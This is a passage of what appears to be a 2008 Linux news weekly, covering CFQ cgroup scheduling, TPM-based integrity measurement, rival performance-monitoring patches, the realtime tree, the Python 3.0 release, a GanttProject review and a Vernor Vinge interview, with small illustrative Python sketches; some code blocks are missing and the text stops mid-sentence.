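    ioprio: int = DEFAULT_IOPRIO
    requests: list = field(default_factory=list)

class CfqMatrix:
    """Rows are cgroups, columns are devices, cells hold CfqData."""

    def __init__(self):
        self.cells = {}  # (cgroup, device) -> CfqData

    def add_cgroup(self, cgroup, devices, parent=None):
        for dev in devices:
            if parent is not None:
                # A child group starts out with its parent's priority.
                ioprio = self.cells[(parent, dev)].ioprio
            else:
                ioprio = DEFAULT_IOPRIO
            self.cells[(cgroup, dev)] = CfqData(ioprio=ioprio)

    def row(self, cgroup):
        """All per-device entries for one cgroup (the cgroup view)."""
        return {d: c for (g, d), c in self.cells.items() if g == cgroup}

    def column(self, device):
        """All per-cgroup entries for one device (the device view)."""
        return {g: c for (g, d), c in self.cells.items() if d == device}
```

Reading a row corresponds to looking at a group's files in the cgroup filesystem, while reading a column corresponds to the per-device view in sysfs.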

Scheduling of cfq_data within the CFQ scheduler is similar to that
of the native CFQ scheduler. Each node is assigned a time slice.
This slice is calculated according to the I/O priority of the device, using
the per-device base time slice.  The time slice offset forms the key of
the red-black node to be inserted in the service tree.  One
cfq_data entry is
picked from the start of the red-black tree and scheduled.  Once its
time slice expires it is added to the tree again, after recalculation
of its time slice offset. So, each cfq_data structure acts as a
queue node per 
device, and, within each CFQ data structure, requests are queued as with a
regular CFQ queue. 
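
The pick, run, and reinsert cycle can be sketched in Python with a binary heap standing in for the red-black tree; both give cheap access to the entry with the smallest key. Everything specific here is an assumption made for illustration: the slice formula, the use of the slice's end time as the new key, and the function names are not taken from the patch.

```python
import heapq

def time_slice(base_slice, ioprio):
    """Assumed formula: priorities run from 0 (highest) to 7 (lowest),
    and a higher priority earns a proportionally longer slice."""
    return base_slice * (8 - ioprio)

def simulate(nodes, base_slice, rounds):
    """nodes maps a node name to its I/O priority.

    Returns the total service time each node received.
    """
    now = 0
    tree = [(0, name) for name in sorted(nodes)]  # (key, node)
    heapq.heapify(tree)
    totals = {name: 0 for name in nodes}
    for _ in range(rounds):
        _, name = heapq.heappop(tree)       # leftmost entry in the tree
        used = time_slice(base_slice, nodes[name])
        now += used                         # the node runs for its slice
        totals[name] += used
        heapq.heappush(tree, (now, name))   # reinsert with a recalculated key
    return totals

print(simulate({"high": 0, "low": 7}, base_slice=10, rounds=4))
```

With these assumptions, every node gets a turn in rotation, and priority shows up as the length of each turn rather than as the number of turns.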

Both BFQ and cfq-cgroups are attempts to bring a higher degree of fairness
to I/O scheduling, with "fairness" being tempered by the desire to add more
administrative control via the control groups mechanism.  They both appear
to be useful solutions, but they must contend with the wealth of other I/O
bandwidth control implementations out there.  Coming to some sort of
consensus on which approach is the right one could prove to be a rather
longer process than simply implementing these algorithms in the first place.

		System integrity in Linux


Ensuring that a Linux system is only running "approved" programs—ones
that haven't been maliciously replaced—is one of the goals of the integrity patches currently
being proposed for the Linux mainline.  With some hardware assistance, in
the form of a Trusted
Platform Module (TPM) chip, systems will be able to
protect against unauthorized binaries as well as attest to other systems
that they are only running good code.  These patches have been around for a
number of years in various forms, but it would seem they are getting close
to being merged.  Perhaps more interestingly, we are starting to see them
being used by various projects.


Over on the kernel page, we have looked at the integrity patches several
times, most recently in March
2007.   The core idea is to complement mandatory access control (MAC)
systems, such as SELinux, by preventing attacks that are made when that
system isn't running—the machine has been booted with a different
kernel for example.  It is generally considered a security truism that
physical access to a device moots any security measures, but with a
properly outfitted TPM-based system, that is no longer the case.


Conceptually, there are two parts to the integrity feature.  One is the
extended verification module (EVM) that associates each file
with a hash that has been calculated over its contents and
metadata.  That hash is then signed by the TPM chip ensuring that
unauthorized changes will be noticed.
The other half
is the integrity measurement
architecture (IMA) which tracks the use of mmap().
IMA verifies the hashes of files that have been mapped in
executable mode and then keeps track of them in a way that the TPM can
sign.  EVM then provides the 
protection against tampering with binaries, while IMA can provide a signed
attestation of which executables have been run.
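
The EVM idea of a keyed hash over contents and metadata can be illustrated in user-space Python. This is a conceptual sketch, not how the kernel code works: an HMAC with a software key stands in for the TPM-backed signature, the choice of SHA-256 and of mode, owner, and group as "metadata" is an assumption, and the function names are hypothetical.

```python
import hashlib
import hmac
import os

def file_digest(path):
    """Hash a file's contents together with some of its metadata."""
    st = os.stat(path)
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    # Assumed metadata set: permission bits, owner, and group.
    h.update(f"{st.st_mode}:{st.st_uid}:{st.st_gid}".encode())
    return h.digest()

def sign(digest, key):
    """Stand-in for the TPM: a keyed MAC over the digest."""
    return hmac.new(key, digest, hashlib.sha256).hexdigest()

def verify(path, key, expected):
    """Return True only if the file still matches its recorded signature."""
    return hmac.compare_digest(sign(file_digest(path), key), expected)
```

A changed byte or a changed permission bit yields a different digest, so verification fails unless the attacker also holds the key, which is the part the TPM is meant to keep out of reach.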


Previous incarnations of EVM and IMA used the Linux Security Modules (LSM)
interface, but that has a very unfortunate side effect: inability to also
run SELinux.  LSM code has no way to stack or cooperate, so there can only
be one module active at a time.  Since integrity and MAC are intended to
work together, this was seen as a rather serious impediment, so the most
recent versions add in hooks for Linux Integrity Modules (LIM).  IMA is
then added as a LIM integrity provider rather than as an LSM.


In response to an Andrew Morton query about the need for LIM/IMA (EVM has
been incorporated into IMA over time), David Safford listed several users of the code:

LIM/IMA's maintenance of a TPM hardware anchored file measurement 
list is fundamental to the Trusted Computing Group's standards 
efforts. Several projects have implemented the TNC (Trusted Network
Connect) and PTS (Platform Trust Services) standards (see below). 
There are three demo packaged distros which have integrated these
apps, two of which are government funded (EU and US), with definite
customer interest. We are working with the RHEL team to provide
a supported, patched kernel for HAP. All of these so far have used
the old LSM based IMA, and have asked for a supported, upstreamed 
implementation, with the ability to work with SELinux.


While that looks a bit like alphabet soup, there is a lot of useful
information there (and in his links further down in the post linked
above).  The biggest news is the three distributions that are implementing
"Trusted Computing".
The High
Assurance Platform (HAP) program is funded by the US National Security
Agency (NSA), the folks who brought us SELinux, while the Open Trusted Computing project is funded
by the European Commission.


While the security that can be provided by a Trusted Computing platform is
useful for some installations, there are some potential pitfalls as well.
Systems with TPM hardware can be configured to only run binaries that are
signed by some external authority.  If manufacturers were to enable that
functionality, but only provide the key to "trusted" software companies,
it would lead to a horrendous loss of freedom.  This is why some have
called it "Treacherous Computing".


There are numerous examples of systems that do not necessarily preserve
physical security, but that one might want to ensure were running the
proper code—voting and cash machines come quickly to mind.  For those
situations, as well as countless others, Trusted Computing will be a real
boon.  We just need to be vigilant so that hardware vendors (or, worse yet,
governments) don't start restricting what we can run on our own machines.


		Dueling performance monitors


Low-level optimization of performance-critical code can be a challenging
task.  At this point, one assumes, the potential for algorithmic
improvements in the targeted code has been realized; what is left is trying
to locate and address problems 
like cache misses, mis-predicted branches, and so on.  Such problems can be
impossible to find by just looking at the code; one needs support from the
hardware.  The good news is that contemporary hardware provides that
support; most processors can collect a wide range of performance data for
analysis.  The bad news is that, despite the fact that processors have been
able to collect that data for many years, there has never been support for
this kind of performance monitoring in the mainline kernel.  That situation
may be about to change, but, first, the development community will have to
make a choice between a venerable out-of-tree implementation and an
unexpected competitor.

The "perfmon" patch set has been under development for some years, but, for
a number of reasons, it has never found its way into the mainline kernel.
The most recent version of the patch was posted for review by
Stéphane Eranian in late
November.  The perfmon patches show the signs of all those years of
development work and
usage experience; they offer a wide set of features and extensive user-space
support.  The full perfmon patch adds twelve system calls to the kernel;
the posted version, though, trims that count back to five in the hope that
a narrower interface will have a better chance of getting into the
mainline.  The additional system calls, one assumes, will be proposed for
inclusion sometime after the perfmon core is merged.
The reduced interface is described in the
patch set; briefly, an application hooks into the performance
monitoring subsystem with a call to:


This system call returns a file descriptor to identify the performance
monitoring session.  The regs parameter is used to return a list
of performance monitoring registers available on the current system;
flags is currently unused.

Specific performance counter registers can be manipulated with:


These system calls can be used to write values into registers (thus
programming the performance monitoring hardware) and to read counter and
configuration information from those registers.

Actually doing some performance monitoring requires a couple more calls:


A call to pfm_attach() specifies which process is to be monitored;
pfm_set_state() then turns monitoring on and off.

There are a couple of distinctive aspects to the perfmon interface.  One is
that it knows almost nothing about the specific performance monitoring
registers; that information, instead, is expected to live in user space.
As a result, the bare perfmon system call interface is probably not
something that most monitoring applications would use; instead, those
system calls are hidden behind a user-space library which knows how to
program different types of processors for the desired results.  Beyond
that, perfmon uses the ptrace() mechanism to stop the monitored
process while performance counters are being queried; as a result, the
monitoring process must have the right to trace the target process.

On December 4, Thomas Gleixner and Ingo Molnar posted a surprise announcement of a new
performance counter subsystem.  The announcement states:


	We are aware of the perfmon3 patchset that has been submitted to
	lkml recently. Our patchset tries to achieve a similar end result,
	with a fundamentally different (and we believe, superior :-)
	design.


This is not the first time that these developers have shown up with an
out-of-the-blue reimplementation of somebody else's subsystem; other
examples include the CFS scheduler, high-resolution timers, dynamic tick,
and realtime preemption.  Most of the time, the new code quickly supplants
the older version - an occurrence which is not always pleasing to the
original developers - but the situation does not seem quite as
straightforward this time.

The proposed interface is much simpler,
adding a single system call:


This call will return a file descriptor corresponding to a single hardware
counter.  A call to read() will then return the current value of
the counter.  The hw_event_period can be used to block reads until
the counter overflows the given value, allowing, for example, events to be
queried in batches of 1000.  The pid parameter can be used to
target a specific process, and cpu can restrict monitoring to a
specific processor.

There are a few advantages claimed for the new implementation.  The
simplicity of the system call interface is one of those; it is possible to
write a very simple application to perform monitoring tasks, with no
additional libraries required.  The second version of the patch
includes a simple "kerneltop" utility which can display a
constantly-updated profile of anything the performance counting hardware
can monitor.  Another advantage is the avoidance of ptrace(); this
reduces the amount of privilege needed by the monitoring process and avoids
perturbing the monitored process by stopping and restarting it.  The
management of counters is said to be more flexible, with facilities for
sharing counters between processes and reserving them for administrative
access.  The low-level hardware interface is said to be simpler as well.

Those claimed advantages notwithstanding, a
number of complaints have been raised with regard to the new performance
monitoring code.  Two of those seem to be at the top of the list: the
single counter per file descriptor API, and programming the hardware
performance monitoring unit inside the kernel.  On the API side, the
biggest concern is that putting each counter behind its own file descriptor
makes it very hard to correlate two or more counters.  Reading two counters
requires two independent read() system calls; as is always the
case, just about anything could happen between those two calls.  So it's
hard to tell how two different counter values relate to each other.  But
that sort of correlation is exactly what developers doing performance
optimization want to do.  Paul Mackerras says:


	Your API has as its central abstraction the "counter".  I am saying
	that that is the wrong abstraction.  The abstraction really needs
	to be a set of counters that are all active over precisely the same
	interval, so that their values can be meaningfully compared and
	related to each other.


In response, Ingo argues that the loss of
precision caused by independent read() calls is small - much
smaller than the muddying of the results caused by stopping the target
process so that all of the counters can be read at the same time.  That
argument does not appear to have convinced the detractors, though.
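
The correlation concern can be made concrete with a toy simulation. The sketch below is not the proposed kernel interface; SimulatedCpu, read_separately(), and read_as_group() are hypothetical names, and the workload's event rates are invented for illustration. It compares two independent reads, between which the workload keeps running, against a single snapshot of both counters.

```python
class SimulatedCpu:
    """Toy model: two event counters that advance as the workload runs."""

    def __init__(self):
        self.instructions = 0
        self.cache_misses = 0

    def run(self, steps):
        # Hypothetical workload: each step retires 100 instructions
        # and incurs exactly one cache miss.
        self.instructions += 100 * steps
        self.cache_misses += steps


def read_separately(cpu, steps_between_reads):
    """Model two independent read() calls, one per counter."""
    instructions = cpu.instructions
    cpu.run(steps_between_reads)   # the workload keeps running in between
    cache_misses = cpu.cache_misses
    return instructions, cache_misses


def read_as_group(cpu):
    """Model one read that samples both counters at the same instant."""
    return cpu.instructions, cpu.cache_misses


cpu = SimulatedCpu()
cpu.run(1000)
group = read_as_group(cpu)               # both values from the same moment
separate = read_separately(cpu, 50)      # second value is 50 steps "late"

true_rate = group[1] / group[0]          # misses per instruction
skewed_rate = separate[1] / separate[0]  # inflated by the gap between reads
```

How large the skew is in practice depends on how much work happens between the two reads, which is exactly the point on which Ingo and the critics disagree.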

The other complaint is that moving the counter programming task into the
kernel requires that the kernel know about the complexities of every
possible performance monitoring unit it may encounter.  This hardware sits
at the core of the most performance-critical CPU subsystems, so its design
parameters value non-interference above features or a straightforward
programming interface.  So programming it can be a complex business,
involving sizeable tables describing how various operations interact with
each other.  The perfmon code keeps those tables in a user-space library,
but the alternative implementation won't allow that.  Quoting Paul again:


	Now, the tables in perfmon's user-land libpfm that describe the
	mapping from abstract events to event-selector values and the
	constraints on what events can be counted together come to nearly
	29,000 lines of code just for the IBM 64-bit powerpc processors.

	Your API condemns us to adding all that bloat to the kernel, plus
	the code to use those tables.


Paul (and others) argue that this information - which can add up to
hundreds of kilobytes - is better kept in user
space.

There also seems to be a bit of concern over the fact that Stéphane had clearly never heard about this work before it was
posted for review.  It must, indeed, be a shock to work on a subsystem for
years, then find a proposed replacement sitting in one's mailbox.  As David
Miller put it:


	And also, another part of the backlash is that the poor perfmon3
	person was completely blindsided by this new stuff.  Which to be
	honest was pretty unfair.  He might have had great ideas about the
	requirements (even if you don't give a crap about his approach to
	achieving those requirements) and thus could have helped avoid the
	past few days of churn.


So, at this point, what will happen with performance monitoring is unclear
at best.  Perhaps, though, this discussion will have the effect of raising
the profile of performance monitoring, which has been without proper kernel
support for many years.  The merging of either solution - or, perhaps, a
combination of both - seems like it has to be an improvement over having no
support at all.

		A new realtime tree


It has been just over four years, now, since the realtime discussion got
serious and the realtime preemption patch set got its start.  During
that time, your editor has heard many predictions for when the bulk of the
realtime work would be merged; generally, the guess has been "within about
a year."  While a lot of realtime work has been merged, some of the
core components of the realtime tree remain outside of the mainline.
Beyond that, the realtime developers have been relatively quiet over the
last year - at least on the realtime front.  Having taken on some little
side tasks - unifying the x86 architecture and maintaining it going
forward, for example 
- some of those developers have been just a little bit distracted recently.


The realtime patch set has not gone away, though.  If nothing else, the
fact that a number of distributors are shipping this code is enough to
ensure continued interest in its development.  So your editor noted with
interest the recent announcement
of a new -rt tree with an updated set of realtime patches.  This tree
will be of interest for anybody wanting to look at the realtime work in the
context of the 2.6.28 kernel or beyond.


One of the core technologies in the realtime tree is a change to how
spinlocks work.  Spinlocks in the mainline will busy-wait until the
required lock becomes available; they thus occupy the processor to no
useful end when acquiring a contended lock.  Holding a spinlock will also
prevent a thread from being preempted.  This behavior is generally best for
system throughput; it also makes it easier to write correct code.  But
anything which prevents a CPU from immediately servicing the
highest-priority process runs counter to the chief design goal of a
realtime operating system: providing deterministic response times in all
situations.  So, for the realtime patches, classic spinlocks had to go.


The solution was to turn most spinlocks into a form of mutex with priority
inheritance.  A process which attempts to acquire a contended "spinlock"
will no longer spin; instead, it goes to sleep and waits for the lock to
become free, making the processor available to another thread.  Code which
holds one of these non-spinlocks is no longer immune to preemption; a
higher-priority thread can always push it out of the way.  By changing
spinlocks in this way, the realtime hackers were able to eliminate one of
the largest sources of latency in the mainline kernel.
Much of that work found its way into the mainline some time ago in the form
of the mutex API, but spinlocks themselves have not been changed in the
mainline.  


To minimize the pain of maintaining the realtime patches, the
developers simply redefined the spinlock_t type to be the new
mutex type instead.  Except that, as it turns out, some spinlocks in
low-level parts of the kernel really do need to be spinlocks still.  So
those were switched to a new raw_spinlock_t type - but without
changing the various spin_lock() calls.  Instead, some truly
frightening macro trickery was introduced to cause the spinlock API to do
the right thing when passed either of two entirely different mutual
exclusion primitives.  This bit of macro magic was always going to be an
impediment to mainline inclusion, so the realtime developers never really
expected to merge the lock code in that form.

The new realtime tree now shows how the realtime developers think this work
might get into the mainline.  It involves a more explicit separation of the
two types of "spinlocks" - and a lot of code churn.  In the realtime tree,
most locks of type spinlock_t are changed to a new lock_t
type.  There is a new set of operations for this type:


For a normal, non-realtime kernel build, lock_t will be the same
as spinlock_t, and things will work as they always have.  On
realtime kernels, instead, lock_t will be a mutex type.  The other
variants of the spinlock API will be represented in the new API (there is
an acquire_lock_irqsave(), for example), but none of them will
actually disable interrupts in a realtime kernel.  Meanwhile,
spinlock_t will remain a true spinlock type.

This change gets rid of the tricky macros, but at the cost of changing the
declarations of and operations on almost all spinlocks in the kernel.  That
is a lot of code changes: a quick grep turns up over 20,000
spin_lock*() calls in the upcoming 2.6.28 kernel.  That will make
for some pain if and when this change is merged.  But in the meantime, it
can only make for a lot of pain for the people who have to maintain
this patch out of tree.  To make their lives a little easier, the realtime
developers have created a couple of scripts to do the bulk of the work.
First, all spinlocks in a pristine kernel are converted to lock_t,
then the few locks which truly must be spinlocks are switched back.  This
work is kept in a separate branch which is regenerated when needed; in this
way, the realtime developers avoid the need to do nasty merges to keep up
with current kernels.
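
The two-pass conversion described above lends itself to a short script. The following Python sketch is only an illustration, not the realtime developers' actual scripts: the acquire_lock()/release_lock() names are assumed for the example, as is the MUST_SPIN list of locks that have to stay true spinlocks.

```python
import re

# Hypothetical set of lock variables that must remain true spinlocks.
MUST_SPIN = {"rq_lock"}

# Pass 1 rewrites: the type name and the basic lock/unlock calls.
RENAMES = [
    (re.compile(r"\bspinlock_t\b"), "lock_t"),
    (re.compile(r"\bspin_lock\("), "acquire_lock("),
    (re.compile(r"\bspin_unlock\("), "release_lock("),
]

# Reverse mapping used by pass 2.
REVERTS = [
    (re.compile(r"\block_t\b"), "spinlock_t"),
    (re.compile(r"\bacquire_lock\("), "spin_lock("),
    (re.compile(r"\brelease_lock\("), "spin_unlock("),
]


def convert_all(source):
    """Pass 1: convert every spinlock use to the new lock_t API."""
    for pattern, replacement in RENAMES:
        source = pattern.sub(replacement, source)
    return source


def revert_raw_locks(source):
    """Pass 2: switch lines that mention a must-spin lock back."""
    out = []
    for line in source.splitlines():
        if any(re.search(r"\b%s\b" % re.escape(name), line)
               for name in MUST_SPIN):
            for pattern, replacement in REVERTS:
                line = pattern.sub(replacement, line)
        out.append(line)
    return "\n".join(out)


sample = """\
static spinlock_t rq_lock;
static spinlock_t dev_lock;
spin_lock(&dev_lock);
spin_unlock(&dev_lock);
spin_lock(&rq_lock);
spin_unlock(&rq_lock);"""

converted = revert_raw_locks(convert_all(sample))
print(converted)
```

Because both passes are mechanical, the converted branch can be thrown away and regenerated from a pristine tree whenever the mainline moves on. A real conversion would have to be far more careful than this line-by-line name matching.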


Your editor has heard talk of another locking change which does not, yet,
appear in this tree.  One problem with the realtime patch set is that it
requires distributors to create yet another kernel build - something they
hate doing - if they want to
support realtime operation.  
In an effort to make life easier for distributors, the
realtime developers are working on a scheme whereby a kernel would
determine at run time whether it should be running in a realtime mode.  If
so, spinlocks will be changed to sleeping locks by patching the kernel
binary as it boots.  Kernels built this way will be able to run efficiently
in either mode.


The branches of the realtime tree provide a quick guide to the other parts
of the realtime work which remain outside of the mainline.  The threaded interrupt handler code
is one example; that change could be proposed (again) for merging in the
near future.  The priority
workqueue mechanism sits in another branch, as do patches aimed at Java
support, filesystem changes, memory management changes, and more.  Then,
there's a branch for stuff which will never be merged; for example, there
is this
patch which gives Java programs direct access to physical memory - not
something which strikes most kernel developers as a good idea.  All told,
there is a great deal of work sitting in the realtime patch set; this work
is finally being organized into a proper git tree.


The "upstream first" policy says that vendors should merge their code
upstream before shipping it to customers.  The 2.6.x development model is
built on the idea that no change is too fundamental to be accepted into a
regular, 3-month development cycle.  The realtime patches would appear to be
an exception to both rules.  It has taken over four years to get to a point
where some of the fundamental realtime technologies are close to ready for the mainline,
but distributors have been shipping this code for at least three of those years.
It has, in other words, been one of the biggest forks of the Linux kernel,
ever.  The plan has always been to join this fork back with the mainline,
though; perhaps, finally, that goal is getting closer.  With luck, it will
happen within about a year.

		Tracking down a "runaway loop"


The Linux boot process, at least as provided by distributions,
depends on help from user space, with 
drivers being loaded as required from the initial filesystem (initramfs/initrd).
Loading drivers requires using tools built into the initramfs and,
if those tools break, the kernel won't boot.  But when a working kernel
configuration and initramfs are used with a new kernel, the result
is expected to be a kernel that successfully boots.  When that doesn't
happen, bugs are filed regarding kernel regressions but, as a recent
example shows, the actual problem may be elsewhere.


The original report was made in late
October, but no progress was made until Evgeniy Polyakov saw it again in early December.  The symptom
was a kernel that hangs after printing:

four times on the console.  Since nothing in the user space (initramfs)
or kernel configuration had changed, it seemed to clearly point to
something in the 
kernel itself.


It turns out that the "runaway loop" message is meant to indicate that the
request_module() function has been invoked recursively.  So in an
effort to load the driver for the character device with major/minor numbers
5/1—which corresponds to
/dev/console—request_module() was invoked again.
The code in kernel/kmod.c:  


		Python 3 is out - now what?


For some years now, the Python development community has been talking about
"Python 3000," the far-future release which would allow a complete
rethinking of the language to fix the various annoyances which had built up over
time.  On December 3, that talk came to fruition with the Python 3.0 release.  This
release is the end result of a great deal of thought and development; it
represents the vision Guido van Rossum and company have for the language
into the indefinite future.  Now that it's out, the Python community as a
whole appears to have stopped for a "now what?" moment.


The wider Python development community appears to be split into three camps on Python 3.0;
the situation amusingly resembles the classic folk tale "Goldilocks and the
three bears."  One set (the "too large" crowd) seems to think that an
incompatible version of Python should never have been released, that
languages should stay compatible forever.  Another group ("too small") can
handle the idea of an incompatible transition, but thinks that the Python
community should have added more shiny features to the language while they
were at it.  And, of course, there's a "just right" crowd taking the
position that the changes in Python 3 are just about as they should
be.  See this
discussion by James Bennett for a well-argued description of the "just
right" position.


Time will tell which position is closest to reality.  If the "too large"
group is right, Python 3 (or Python in general) will fade away as
developers, unhappy with the break, move to a language they like better.
If Python 3 is too small, there will be strong pressure for a
Python 4 in the too-near future.  Your editor, though, thinks that the
Python community has come pretty close to getting it right.  Things that
truly needed to be fixed got fixed, but the Python developers resisted the
temptation to try to do too much.  They watched, from a safe distance, what
happened with the Mozilla rewrite and Perl 6, and wisely concluded
that their lives - and the lives of those who use Python - would be better
if they avoided a similar experience.  So they limited their goals and were
able to get the job done in a reasonable amount of time.


Except, of course, that the job is not really done.  To begin with, the
presence of a few difficulties with the 3.0 release should not surprise
anybody.  The developers forgot to remove the deprecated cmp()
function, with the result that newly-converted code may come to depend on
it.  There are some performance issues.  A couple of other features are not
working quite right.  Getting Unicode truly straightened out may take a
while yet - a problem which is certainly not unique to Python.  The list
seems to be quite short given that this is a 
major release of a complex programming language, but there are still things
to fix.  So there will almost certainly be a 3.0.1 release before the end
of the year, and a 3.0.2 in (approximately) February.
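
Code being ported can avoid leaning on cmp() altogether. The sketch below shows two common replacements in Python 3: a one-line three-way comparison built from ordinary operators, and sorting by key rather than by comparison function. The three_way() helper and the sample data are made up for illustration; functools.cmp_to_key() is a standard-library helper that arrived in releases later than the 3.0 discussed here.

```python
from functools import cmp_to_key


def three_way(a, b):
    """Return -1, 0, or 1, as the old cmp() built-in did."""
    return (a > b) - (a < b)


releases = ["2.6", "3.0", "2.5"]

# Preferred: sort by key, with no comparison function at all.
by_key = sorted(releases, key=lambda r: tuple(int(p) for p in r.split(".")))

# Fallback for legacy comparison functions: wrap them with cmp_to_key().
by_cmp = sorted(releases, key=cmp_to_key(three_way))
```

Sorting by key is usually the better choice when it is available; the cmp_to_key() wrapper is mainly useful for carrying an existing comparison function across unchanged.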


Meanwhile, the Python hackers have made it clear that the 2.x version of the language
will be supported for some years yet.  Version 2.6, available now,
includes a number of features aimed at making the eventual port to 3.0
easier.  As the porting projects get serious, other ways to help that
process will become clear; there will be an eventual 2.7 release which
incorporates those lessons wherever possible.  A 2.8 release further down
the road has not been ruled out.  The current plan seems to be to maintain
Python 2.x for at least the next three years.


That is good because, for many Python developers, it is not yet really time
to make the jump to 3.0.  The core language appears to be in
reasonably good shape, but a language like Python involves much more than
the core.  Most non-trivial code makes heavy use of the wide variety of
Python libraries, and, at this point, many or most of those libraries do
not support Python 3.  So, now is a good time for library maintainers
to be looking at moving to 3.0, but application developers who try to
port their code now are likely to run into frustration.  Porting smaller
programs or subsystems as an exercise in learning the new language may make
sense, but complex application porting probably cannot happen for a little
while yet.


What distributors should be doing is another question.  So far, it would
appear that only Fedora is having a (public) discussion on how to handle
the Python 3 transition - see this
thread - and they don't really know what they are going to do yet.
Fedora's maintainers, it seems, would prefer to stay with Python 2 for
the indefinite future; the chances of Python 3 making an appearance in
Fedora 11 are quite small.  There is a strong wish to avoid
maintaining both 2.x and 3.x on the same distribution release; they would
rather make a clean switch.

Your editor suspects that the flag-day approach to the language transition
is not going to work.  There are a lot of packages which need to be ported,
and many of the people doing the porting would appreciate support from
their distributor.  Red Hat dragged its feet for a long time on the
transition to Python 2, with the result that many users had to build
and install the newer version of the language themselves.  For Fedora to do
the same with Python 3 is a sure path toward user frustration.


That said, keeping both versions of the language around is not a task for
the faint of heart.  Installing a different version of Python itself is
quite easy.  Keeping a whole set of modules for multiple versions is
distinctly less so.  This will be especially true for Fedora; some other
distributions (especially the Debian-derived ones) have better mechanisms
for (and experience in) maintaining multiple versions of core system tools.
So the reluctance on the part of the Fedora developers to take on this work
is thus unsurprising.  Perhaps this would be a good opportunity for offers
of help from the wider Fedora community.

It may well take a couple of years, but this transition will eventually be
made and people will eventually wonder what all the fuss was about.  And,
when it's done, we'll have a cleaner, more maintainable, more
Unicode-rational version of an important programming language to work
with.  That, one hopes, will be worth the short-term pain involved in
getting there.

(For more information, see the Python3000 FAQ,
currently under development).

		Create and Manage Gantt Charts with GanttProject


GanttProject
is an open-source cross-platform Java application that can be used
to generate
Gantt charts
for the management of projects.  Different components of
GanttProject have been
released
under the GPL and Apache licenses.
The project is described:


GanttProject is a free and easy to use Gantt chart based project scheduling and management tool. Our major features include:
Task hierarchy and dependencies, Gantt chart, Resource load chart,
Generation of PERT chart, PDF and HTML reports,
MS Project import/export, WebDAV based groupwork.


The "learn about"
document explains more of the project's features, and some
screen shots
show what an older version of GanttProject looks like.
Version 2.0.8 of GanttProject was recently announced:


The major improvement in GanttProject 2.0.8 is that task web links now appear in PDF and HTML exports. Besides, those who use filesystem paths as web links, now can specify relative path to a file from .gan file location. GanttProject 2.0.8 also includes a few bugfixes and localization improvements for Croatian, Japanese and Colombian users.


Installation of GanttProject 2.0.8 on an Ubuntu 8.04 system was
fairly straightforward.  The software was downloaded and unzipped.
The prerequisite Sun Java Runtime Environment was downloaded
and installed.
The ganttproject.sh startup file was given execute permission and
run; the application started up as expected.


GanttProject is easy to figure out.  There are top-level tabs for
creating charts and resources (people).  Tasks can be added, assigned
date ranges and a variety of other attributes.  Tasks can be tied to
other predecessor tasks and assigned to people.
It only took a few minutes of poking around the software to create a
new project, produce a simple Gantt chart and output a PostScript
file that was suitable for printing.


GanttProject is not alone in its ability to generate Gantt charts
under Linux.
Planner is a
project management tool for the GNOME desktop environment and
TaskJuggler is yet
another project management tool.  Both of these applications
have a broader project management scope.
If you only need to generate Gantt charts, GanttProject
is a straightforward application that can be used to easily
produce professional-looking results.


		Interview: Vernor Vinge


Science fiction writer Vernor Vinge is best-known for novels like A
Fire Upon the Deep and Rainbows End, as well as the concept
of The
Singularity -- the idea that, in the next couple of decades, humans
will become or create a super-human intelligence. What is less well-known
is that Vinge has been a free software supporter since the earliest days of
the Free Software Foundation (FSF). He has served several times on the jury
for the FSF Awards and spoke at an FSF-sponsored event held last month in
San Diego to coincide with the LISA conference. As someone who deals
regularly with large scale speculations, Vinge places free software in a
larger historical context. He even speculates that free software may be one
of the factors that will shortly bring about the Singularity. 


Part of Vinge's interest in free software is personal. A mathematician and computer scientist, he quickly found that the rise of proprietary software greatly increased the difficulties of teaching. 

 "When I looked at contracts and user-agreements," he
recalls, "the legalese was extraordinarily intimidating, not just
because it was complicated, but because it actually seemed to restrict
things to the point where it was really difficult to imagine how a student
could follow the agreement and still do a project. So the openness that was
in the GNU General Public License (GPL) was really very, very
welcome." Vinge soon got into the habit of giving students "a
little spiel about the GPL" and encouraging them to license their
projects under the GPL.  

"If they did that," he says, "that would mean I would be
able to use their stuff in later projects with other students. And a very
large percentage of students in most classes thought it was a cool enough
idea that they actually did use [the GPL] in their projects." 

The historical trend to cooperative infrastructure

However, as important as free software may have been to Vinge in his teaching, what seems to interest him the most is placing free software in a broader historical context. Early on, Vinge came to view free software -- and, later on, the Internet and social networking applications that it was instrumental in creating -- as part of a historical trend towards creating an increasingly elaborate "infrastructure of trust and cooperation" that increases the rate of technological advance.


Vinge says: "There are business inventions of the last 2000 years
like the widespread use of loans and credit, the use of insurance, the use
of limited liability corporations, all of which involve at least at the
beginning, a leap of trust." To Vinge, free software, the Internet and
social networking are simply the latest extensions to the infrastructure
created from such institutions. What these institutions all have in common
is that they allow people to interact in more creative and productive
ways.


More specifically, he sees free software as the natural and more logical
extension of the insight that had produced the shareware culture a few
years before the start of the GNU Project and the FSF.  With
the emergence of the personal computer, entrepreneurs were finding that
"the barriers to entry were so low that you didn't need a lot of the
overhead that was involved in commercial stuff, and you might just be able
to get away with trusting people to pay you. There was much blind feeling
around the concept of producing stuff in some sort of context that was
different from cars." 


According to Vinge, what the GPL and the software and institutions that
have grown up around it have produced is "a platform for experimenting with
social invention. In the 20th and 19th century, if you wanted to experiment
with a new infrastructure for people to interact in, in most cases, like
with the railroads, you needed enormous effort. And now -- we can actually
do social experiments -- cooperative experiments -- much more cheaply, and
you can design ways for people to interact based on just the software
guiding what the interactions are like." 


Vinge acknowledges that the consequences have not always been beneficial.
"One thing the last ten years have proved is that we seem to be very
bad at thinking how stuff can be abused," he says, no doubt thinking
of such phenomena as crackers and online predators. "Any time you
can make something a hundred or a thousand times cheaper than it was
before, there are probably side-effects. But there's a tendency when
something works really, really well to push it hard and deliberately avoid
thinking about side-effects." 


Still, the main change has been beneficial overall in Vinge's view. In
particular, he says: "One nice thing is that the price of failure is
a lot lower than what you might imagine in the 19th century. Say someone
spent ten million 1850 dollars, to make steam-powered dirigibles. Now, it
doesn't work, and you've just spent a lot of money, and you don't have
anything except a lot of ruined effort. Now, there's still ruined effort if
something doesn't work out, but you can retarget or repurpose much more
easily, and you can justify taking much larger leaps of faith than you
could in 1850." The result is that more experimentation, and more and
quicker development, become possible.


In this view, free software represents the currently most-advanced
realization of the possibilities inherent in computer technology. "It's an
interesting, science-fictiony, parallel-world story to imagine what would
have happened if Richard Stallman hadn't come along with the GPL," says
Vinge. "Without Richard Stallman's insight, I think we would have
eventually got something like what we got with free software, but it would
